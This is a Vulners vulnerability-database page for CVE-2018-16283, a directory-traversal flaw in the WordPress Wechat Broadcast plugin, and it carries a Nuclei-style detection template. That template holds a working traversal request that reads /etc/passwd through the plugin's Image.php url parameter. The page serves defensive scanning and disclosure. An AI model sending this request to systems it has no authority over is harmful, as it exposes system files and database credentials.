Vulners
Lucene search
WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | WordPress Wechat Broadcast Plugin Directory Traversal Vulnerability | 25 Sep 201800:00 | – | cnvd |
 | Wechat Brodcast Project Directory Traversal (CVE-2018-16283) | 5 Jun 202000:00 | – | checkpoint_advisories |
 | CVE-2018-16283 | 24 Sep 201822:00 | – | cve |
 | CVE-2018-16283 | 24 Sep 201822:00 | – | cvelist |
 | WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion | 19 Sep 201800:00 | – | exploitdb |
 | WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion | 19 Sep 201800:00 | – | exploitpack |
 | CVE-2018-16283 | 24 Sep 201822:29 | – | nvd |
 | WordPress Multiple Plugins / Themes Directory Traversal / File Download Vulnerability (HTTP) | 20 Nov 202000:00 | – | openvas |
 | WordPress Wechat Broadcast plugin <= 1.2.0 - Local/Remote File Inclusion vulnerability | 3 Oct 201800:00 | – | patchstack |
 | Directory traversal | 24 Sep 201822:29 | – | prion |
10
id: CVE-2018-16283
info:
name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
author: 0x240x23elu
severity: critical
description: WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter.
impact: |
Unauthenticated attackers can read arbitrary files on the WordPress server through directory traversal in the Image.php url parameter, potentially exposing wp-config.php containing database credentials, private keys, and other sensitive configuration files.
remediation: |
Update to the latest version of the WordPress Plugin Wechat Broadcast or apply the patch provided by the vendor to fix the LFI vulnerability.
reference:
- https://www.exploit-db.com/exploits/45438
- https://nvd.nist.gov/vuln/detail/CVE-2018-16283
- https://github.com/springjk/wordpress-wechat-broadcast/issues/14
- http://seclists.org/fulldisclosure/2018/Sep/32
- https://exchange.xforce.ibmcloud.com/vulnerabilities/150202
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-16283
cwe-id: CWE-22
epss-score: 0.6307
epss-percentile: 0.99094
cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: wechat_brodcast_project
product: wechat_brodcast
framework: wordpress
tags: cve,cve2018,edb,seclists,wordpress,wp-plugin,lfi,wechat_brodcast_project,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
# digest: 4b0a004830460221009a889e1bc0223434afe5b6d6215cb62dbe80d6b5e886e0a1f2cbd498d8276483022100b3b4935f5303ae41ef4af5c8fd19d12ea2c57a3a4ae2ce030581d14e01a72409:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
8.4High risk
Vulners AI Score8.4
CVSS 27.5
CVSS 39.8
EPSS0.6307